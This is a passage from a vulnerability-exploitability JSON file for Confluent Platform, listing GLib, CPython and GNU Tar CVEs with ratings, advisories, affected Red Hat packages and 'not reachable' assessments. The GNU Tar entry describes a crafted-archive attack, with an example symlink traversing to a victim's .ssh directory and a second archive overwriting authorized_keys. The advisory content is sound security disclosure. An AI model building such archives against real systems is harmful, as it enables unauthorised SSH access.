          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-3360",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in GLib. An integer overflow and buffer under-read occur when parsing a long invalid ISO 8601 timestamp with the g_date_time_new_from_iso8601() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-3360"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-3360"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2357754"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3647"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/work_items/3647"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00024.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3360"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-3360"
        }
      ],
      "published": "2025-04-07T13:15:43+00:00",
      "updated": "2026-06-30T15:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-4516",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "There is an issue in CPython when using `bytes.decode(\"unicode_escape\", error=\"ignore|replace\")`. If you are not using the \"unicode_escape\" encoding or an error handler your usage is not affected. To work-around this issue you may stop using the error= handler and instead wrap the bytes.decode() call in a try-except catching the DecodeError.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-4516"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/16/4"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/19/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23530"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-4516"
        },
        {
          "url": "https://bugzilla.redhat.com/2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11168"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9287"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0938"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4138"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4330"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4435"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4516"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4517"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2025-23530.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23530"
        },
        {
          "url": "https://github.com/python/cpython/commit/4398b788ffc1f954a2c552da285477d42a571292"
        },
        {
          "url": "https://github.com/python/cpython/commit/5646648678295a44aa82636c6e92826651baf33a"
        },
        {
          "url": "https://github.com/python/cpython/commit/6279eb8c076d89d3739a6edb393e43c7929b429d"
        },
        {
          "url": "https://github.com/python/cpython/commit/69b4387f78f413e8c47572a85b3478c47eba8142"
        },
        {
          "url": "https://github.com/python/cpython/commit/73b3040f592436385007918887b7e2132aa8431f"
        },
        {
          "url": "https://github.com/python/cpython/commit/8d35fd1b34935221aff23a1ab69a429dd156be77"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e%20%28main%29"
        },
        {
          "url": "https://github.com/python/cpython/commit/ab9893c40609935e0d40a6d2a7307ea51aec598b"
        },
        {
          "url": "https://github.com/python/cpython/issues/133767"
        },
        {
          "url": "https://github.com/python/cpython/pull/129648"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-4516.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-23530.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L75IPBBTSCYEF56I2M4KIW353BB3AY74/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4516"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
        }
      ],
      "published": "2025-05-15T14:15:31+00:00",
      "updated": "2026-07-31T14:16:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-45582",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        24
      ],
      "description": "GNU Tar through 1.35 allows file overwrite via directory traversal in crafted TAR archives, with a certain two-step process. First, the victim must extract an archive that contains a ../ symlink to a critical directory. Second, the victim must extract an archive that contains a critical file, specified via a relative pathname that begins with the symlink name and ends with that critical file's name. Here, the extraction follows the symlink and overwrites the critical file. This bypasses the protection mechanism of \"Member name contains '..'\" that would occur for a single TAR archive that attempted to specify the critical file via a ../ approach. For example, the first archive can contain \"x -> ../../../../../home/victim/.ssh\" and the second archive can contain x/authorized_keys. This can affect server applications that automatically extract any number of user-supplied TAR archives, and were relying on the blocking of traversal. This can also affect software installation processes in which \"tar xf\" is run more than once (e.g., when installing a package can automatically install two dependencies that are set up as untrusted tarballs instead of official packages). NOTE: the official GNU Tar manual has an otherwise-empty directory for each \"tar xf\" in its Security Rules of Thumb; however, third-party advice leads users to run \"tar xf\" more than once into the same directory.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-45582"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/11/01/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:0067"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-45582"
        },
        {
          "url": "https://bugzilla.redhat.com/2379592"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379592"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-45582"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-0067.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:0067"
        },
        {
          "url": "https://github.com/i900008/vulndb/blob/main/Gnu_tar_vuln.md"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-45582.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-0067.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-tar/2025-08/msg00012.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45582"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8510-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-45582"
        },
        {
          "url": "https://www.gnu.org/software/tar/"
        },
        {
          "url": "https://www.gnu.org/software/tar/manual/html_node/Integrity.html"
        },
        {
          "url": "https://www.gnu.org/software/tar/manual/html_node/Integrity.html#Integrity"
        },
        {
          "url": "https://www.gnu.org/software/tar/manual/html_node/Security-rules-of-thumb.html"
        }
      ],
      "published": "2025-07-11T17:15:37+00:00",
      "updated": "2026-06-17T09:25:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
